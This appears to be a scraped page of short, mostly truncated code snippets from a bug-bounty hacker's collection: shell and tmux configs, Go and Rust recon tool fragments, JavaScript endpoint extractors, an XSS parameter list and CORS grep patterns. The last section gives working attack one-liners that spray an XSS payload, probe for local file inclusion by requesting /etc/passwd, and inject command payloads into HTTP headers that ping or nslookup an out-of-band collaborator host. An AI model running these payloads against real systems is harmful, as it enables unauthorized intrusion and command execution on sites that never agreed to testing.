0x3n0

#!/bin/bash

battery_status=$(acpi | awk '{print $3}')
battery_percentage=$(acpi | awk '{print $4}' | sed 's/,//')

if [ "$battery_status" == "Discharging," ]; then
    icon="🔋"
else
    icon="🔌"

0x3n0

set -g mouse on

# unbind default prefix and set it to ctrl-a
unbind C-b
set -g prefix C-a
bind C-a send-prefix

# make delay shorter
set -sg escape-time 0

0x3n0

Dorks with Go

package main

import (
	"fmt"
	"log"
	"net/http"
	"net/http/cookiejar"
	"os"

0x3n0

#!/usr/bin/env zsh
rm ~/recon -rf

mkdir ~/recon
cd ~/recon

curl -O "https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json"

cat chaos-bugbounty-list.json | jq -r '.programs[].name' | while read folder; do mkdir -p "$folder"; done

0x3n0

curl -L -k -s $1 | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# using linkfinder
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}

# with file download (the new best one):
# but there is a bug if you don't provide a root url

0x3n0

Subs

package main

import (
    "fmt"
    "net/http"
    "io/ioutil"
    "encoding/json"
    "os"

0x3n0

use std::io::{self, BufRead, Read, Write};
use std::net::TcpStream;
use std::str;

fn extract_urls(body: &str) -> Vec<&str> {
    let mut urls = vec![];

    for line in body.lines() {
        if let Some(start) = line.find("src=") {

0x3n0

{
  "XSS": [
    "q=",
    "s=",
    "search=",
    "lang=",
    "keyword=",
    "query=",
    "page=",
    "keywords=",

0x3n0

{
  "flags": "-HnriE",
  "patterns": [
    "Access-Control-Allow-Origin: *",
    "Access-Control-Allow-Methods: *",
    "Access-Control-Allow-Headers: *",
    "Access-Control-Allow-Credentials: true",
    "Access-Control-Expose-Headers: *",
    "Access-Control-Max-Age: *"
  ]

0x3n0

assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done
 
assetfinder https://exmple.com | gau --subs https://exmple.com  | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
  
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done
  
### DNS rebinding for RCE
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H